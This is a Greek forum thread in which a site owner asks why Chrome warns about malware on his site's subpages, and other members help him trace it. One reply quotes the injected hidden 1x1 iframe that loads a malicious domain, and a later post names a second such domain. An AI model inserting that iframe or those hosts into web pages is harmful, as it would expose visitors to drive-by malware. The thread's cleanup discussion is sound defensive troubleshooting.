Προς το περιεχόμενο

www.webexperience13.com


varsa

Προτεινόμενες αναρτήσεις

Δημοσ.

Γειά σας.Έχω φτιάξει μια δικιά μου ιστοσελίδα και ενώ τρέχει κανονικά απ'το mozilla firefox,όταν πάω να την τρέξω απ'το google chrome,σε ορισμένες υποσελίδες,μου εμφανίζει το παρακάτω μήνυμα: Εντοπίστηκε κακόβουλο πρόγραμμα! Προειδοποίηση:Η επίσκεψη σε αυτόν τον ιστότοπο ίσως είναι επιοβλαβής για τον υπολογιστή σας! Ο ιστότοπος στον κεντρικό υπολογιστή http://www.varsa.gr περιέχει στοιχεία από τον ιστότοπο http://www.webexperience13.com'>http://www.webexperience13.com ,η οποία φαίνεται να φιλοξενεί κακόβουλα προγράμματα,δηλαδή λογισμικό που μπορεί να είναι επιβλαβές για τον υπολογιστή σας ή να εκτελεί λειτουργίες χωρίς τη συγκατάθεση σας.Και μόνο η επίσκεψη ενός ιστότοπου που περιέχει κακόβουλα προγράμματα μπορεί να μολύνει τον υπολογιστή σας. Μετά έχει μια επιλογή που λέει Κατανοώ ότι η επίσκεψη σε αυτόν τον ιστότοπο ίσως είναι επιβλαβής για τον υπολογιστή μου. Αν πατήσω "πίσω στην ασφάλεια" τότε επιστρέφει στην κεντρική σελίδα index.php.Αν τσεκάρω την επιλογή και πατήσω συνέχεια,με πάει στο link και δε μου το ξαναεμφανίζει το παραπάνω μήνυμα. Δεν εμφανίζεται σε όλα τα link αυτό το μήνυμα αλλά μόνο σε μερικά. Όταν κάποια πήγε να δει κάποιο link,το antivirus της εντόπισε ιό. Το link http://www.webexperience13.com δε φορτώνει καθόλου ενώ πήγα στον κώδικα του index.php στα οποία εμφανίζεται το μήνυμα αυτό(σε όλες δηλαδή τις υποσελίδες),και δεν υπάρχει η λέξη webexperience,όπως και στον server δεν υπάρχει κάτι τέτοιο. Τι φταίει και πώς θα διορθωθεί το πρόβλημα;web

Δημοσ.

Κι όμως υπάρχει:

 

><iframe src="http://webexperience13.com/?click=17927265" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

 

Το παραπάνω snippet είναι από τις "Απόψεις" σου. Και το webexperience13 είναι όντως κακόβουλο site, και πολύ κακώς το αναπαράγεις.

 

Υ.Γ: Προτείνω στους mods να σβήσουν τα direct links από το μήνυμα του OP

Δημοσ.

για κατσε ρε φιλε το παιδι δεν αναπαραγει τιποτα, αυτο ξαφνικα απο μονο του εκανε την εμφανιση στον κωδικα του, χςρισ και ο ιδιος να ξερει γιατι συνεβει αυτο.

 

Δεν το εβαλε ο ιδιος μεσα και απορω πως μπηκε εκει.

 

Ξερει κανεις?

Δημοσ.

Κλασικό worm. Μεταδίδεται με διάφορους τρόπους από εκτελέσιμο πάνω στο PC σου, τρύπα ασφάλειας στον server που φιλοξενείσαι, προβλήματα με σχετιζόμενες τρύπες ασφάλειας στον κώδικα σου έως ότι μπορείς να φανταστείς. Εάν δεν απατώμαι αρκεί να κάνεις με κάποιο util replace το κομμάτι του κώδικα που σου έχει προσθέσει το worm (με το iframe) π.χ dream weaver. Καλό είναι να επικοινωνήσεις και με την εταιρία φιλοξενίας του web site σου. Νομίζω χτυπάει windows server.

Δημοσ.

view-source:http://www.varsa.gr/forum/viewforum.php?f=2&sid=805ba02e6343937804cdb1c655b0441a

 

Αυτο σημαινει πς το viewforum.php πρεπει να κανει το παιδι edit και δελετε την αναφορα?

Δημοσ.

Πώς θα διορθώσω το πρόβλημα;Έκανα edit με το dreamweaver το αρχείο viewforum.php που είναι στον server αλλά δε βρίσκω το συγκεκριμένο κομμάτι κώδικα.Το κομμάτι αυτό πώς προστέθηκε;

Δημοσ.

Το κομμάτι -λογικα- θα το βρεις στο template που χρησιμοποιεις.

Δεν είδα τη σελιδα αλλά αν είναι κάτω κάτω πρέπει να είναι

στο footer.php (ή footer.tpl αναλογα τι τρέχεις μιας και που δεν το είδα καθολου).

 

Αν είναι πάνω πάνω θα είναι στο header file του template κ.ο.κ....

Δημοσ.

πανω πανω ειναι στον header και μαλιστα σημερα εμφανιζει και αλλη κακοβουλη σελιδα την hostverify.net.

 

Ο varsa δεν ξερει τι ακριβως πρεπει να ακνει εδιτ στο viweforum.php δεν βρηκε τιποτα.

Αρχειοθετημένο

Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.

  • Δημιουργία νέου...